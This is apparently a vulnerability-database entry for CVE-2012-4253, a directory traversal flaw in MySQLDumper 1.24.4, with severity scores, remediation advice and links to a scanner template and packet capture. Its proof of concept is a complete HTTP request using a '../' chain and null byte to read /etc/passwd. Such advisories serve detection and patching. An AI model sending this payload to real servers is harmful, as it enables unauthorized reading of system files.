| Title | MySQLDumper 1.24.4 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. |
| CVSS Score | 4.3 |
| EPSS Score | 0.62719 |
| CVE ID | CVE-2012-4253 |
| CWE ID | CWE-22 |
| Tags | cve2012 cve packetstorm lfi edb mysqldumper xss vuln |
Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 X11; Ubuntu; Linux x86_64; rv:126.0 Gecko/20100101 Firefox/126.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-4253.yaml
🦈 Packet Capture: ⬇️ Download cve-2012-4253.pcap
N/AN/A